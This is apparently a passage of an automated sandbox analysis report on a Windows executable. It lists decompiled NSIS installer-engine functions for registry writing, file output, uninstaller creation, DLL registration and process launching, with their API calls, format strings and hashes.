                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                            • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                            • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                            • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                            • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                            Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                            • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                            • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                            • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                            • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                            • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                            • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                            • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                            • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                            • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                            Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                            • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                            • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                            • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                            • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                            Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                            • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                            • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                            • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                            • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                            Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                            • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                            • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                            • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                            • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                            • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                            Function 0040324C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00010A00,00000064,000D2B75), ref: 00403295
                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                            • String ID: u+$verifying installer: %d%%
                                                                                                                                                                                                                                                                            • API String ID: 1451636040-2773432420
                                                                                                                                                                                                                                                                            • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                            • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                            Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                            • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                            Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                            • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                            • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                            • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                            • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                            Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                            • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Message$Send$ClientScreen
